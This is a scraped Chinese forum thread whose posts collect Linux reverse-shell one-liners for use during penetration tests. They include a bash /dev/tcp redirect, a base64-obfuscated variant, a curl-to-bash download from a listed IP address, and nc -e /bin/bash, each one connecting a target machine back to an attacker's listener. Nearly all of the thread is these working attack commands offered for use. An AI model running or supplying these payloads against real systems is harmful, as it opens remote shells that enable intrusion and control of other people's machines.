网页
资讯
视频
图片
知道
文库
贴吧
地图
采购
进入贴吧
全吧搜索
吧内搜索
搜贴
搜人
进吧
搜标签
日
一
二
三
四
五
六
签到排名:今日本吧第
个签到,
本吧因你更精彩,明天继续来努力!
本吧签到人数:0
一键签到
可签
7
级以上的吧
50
个
一键签到
本月漏签
0
次!
0
成为超级会员,赠送8张补签卡
如何使用?
点击日历上漏签日期,即可进行
补签
。
连续签到:
天 累计签到:
天
0
超级会员单次开通12个月以上,赠送连续签到卡3张
使用连续签到卡
11月13日
漏签
0
天
武汉茑萝吧
关注:
8
贴子:
1,253
看贴
图片
吧主推荐
游戏
5
回复贴,共
1
页
<返回武汉茑萝吧
>0< 加载中...
武汉茑萝:Linux下反弹shell
取消只看楼主
收藏
回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
送TA礼物
1楼
2022-07-27 10:31
回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
bash反弹
1. 靶机上执行
bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1
收到shell
2楼
2022-07-27 10:32
回复
收起回复
2025-11-13 16:41:49
广告
不感兴趣
开通SVIP免广告
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
2. 在特殊情况可以使用base64编码执行bash反弹shell
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'
3楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
curl反弹
1. vps开启一个web服务,端口80。并编写index.html文件,内容包含bash一句话即可
python3 -m http.server 80vim index.htmlbash -i >& /dev/tcp/vps ip/port 0>&1
4楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
2. vps开启监听
nc -lvnp 6666
3. 靶机执行
curl 39.100.88.162/index.html|bash
成功接收反弹shell
5楼
2022-07-27 10:32
回复
收起回复
茑萝poptest
铁杆吧友
9
该楼层疑似违规已被系统折叠
隐藏此楼
查看此楼
nc反弹
nc -e /bin/bash 39.100.88.162 8000
#或者是/bin/sh都行
-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。
6楼
2022-07-27 10:32
回复
收起回复
登录百度账号
扫二维码下载贴吧客户端
下载贴吧APP
看高清直播、视频!
贴吧热议榜
1
耄耋豆浆上线,哈集美原地炸毛
2267580
2
体制大冤种遭彩礼刺客硬逼下乡
1655436
3
多兰狮子开大口,要求高薪续长约
1231496
4
日韩日常怪中国,网友调侃老中很忙
869751
5
狠活,宙斯被经纪人打包送往LPL
737126
6
车圈打击黑公关,小米KOL被团灭
677025
7
昭和米国物语跳票,有爆雷之相?
623592
8
川普续费成功,美政府开机重启
458160
9
画男硬说女,孙笑川重塑女性美
354134
10
捂嘴行动,吃瓜蒙主疑遭全网封杀
294105
贴吧页面意见反馈
违规贴吧举报反馈通道
贴吧违规信息处理公示